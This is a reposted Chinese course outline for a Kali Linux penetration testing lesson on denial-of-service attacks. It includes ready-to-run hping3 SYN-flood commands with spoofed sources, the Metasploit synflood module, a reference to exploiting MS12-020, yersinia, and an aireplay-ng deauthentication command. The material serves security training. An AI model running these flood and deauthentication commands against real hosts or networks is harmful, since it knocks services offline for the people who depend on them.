您的位置:首页 > 运维架构 > Linux

Kali Linux Web 渗透测试视频教程— 第十六课-拒绝服务攻击

2014-12-14 18:50 1086 查看

Kali Linux Web 渗透测试视频教程—

第十六课-拒绝服务攻击

文/玄魂



目录

Kali Linux Web 渗透测试视频教程— 第十六课-拒绝服务攻击...................... 1

DoS............................................................................................................... 2

DDoS............................................................................................................... 2

yersinia........................................................................................................... 3

hping3............................................................................................................ 4

利用系统漏洞进行拒绝服务攻击............................................................... 5

使用metasploit进行synflood攻击............................................................. 5

无线网络DoS................................................................................................ 5

Flood系列工具.............................................................................................. 6

视频教程地址:http://edu.51cto.com/course/course_id-1887.html

DoS

l 拒绝服务攻击即攻击者想办法让目标机器停止提供服务

l 1.消耗带宽,cpu,内存资源(各种洪水攻击)

l 3.延长响应时间

l 4.利用服务漏洞,攻陷服务

l 5.IP欺骗



DDoS



yersinia

l
http://www.yersinia.net/

l
Yersinia是一款底层协议攻击入侵检测工具。它能实施针对多种协议的多种攻击。例如夺取生成树的根角色(生成树协议:Spanning Tree Protocol),生成虚拟CDP(Cisco发现协议:Cisco Discovery Protocol)邻居、在一个HSRP(热等待路由协议:Hot Standby Router
Protocol)环境中虚拟成一个活动的路由器、制造假DHCP反馈,以及其它底层攻击。

l
yersinia -G



hping3

l
 Hping是用于生成和解析TCPIP协议数据包的开源工具。创作者是Salvatore
Sanfilippo。目前最新版是Hping3,支持使用tcl脚本自动化地调用其API。Hping是安全审计、防火墙测试等工作的标配工具。

l
  Hping优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机进行细致地探测。

l
使用手册:http://linux.die.net/man/8/hping3



l hping3 -S --flood -V www.xxx.com

l hping3 -S -P -U --flood -V --rand-source www.xxx.com

l hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source www.xxx.com



利用系统漏洞进行拒绝服务攻击

l 示例:

l 扫描开发445
或者3389的机器

l 利用ms12-020漏洞

l 使用metasploit进行攻击



使用metasploit进行synflood攻击

l use auxiliary/dos/tcp/synflood



无线网络DoS

l
1. iwconfig

l
airmon-ng start wlan0

l
airodump-ng mon0

l
Connect to the Access Point

l
aireplay-ng --deauth 1000 -a
00:09:5B:6F:64:1E-h 44:6D:57:C8:58:A0 mon0




Flood系列工具



ps:对此文章感兴趣的读者,可以加qq群:Hacking:303242737;Hacking-2群:147098303;Hacking-3群:31371755;hacking-4群:201891680;Hacking-5群:316885176

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐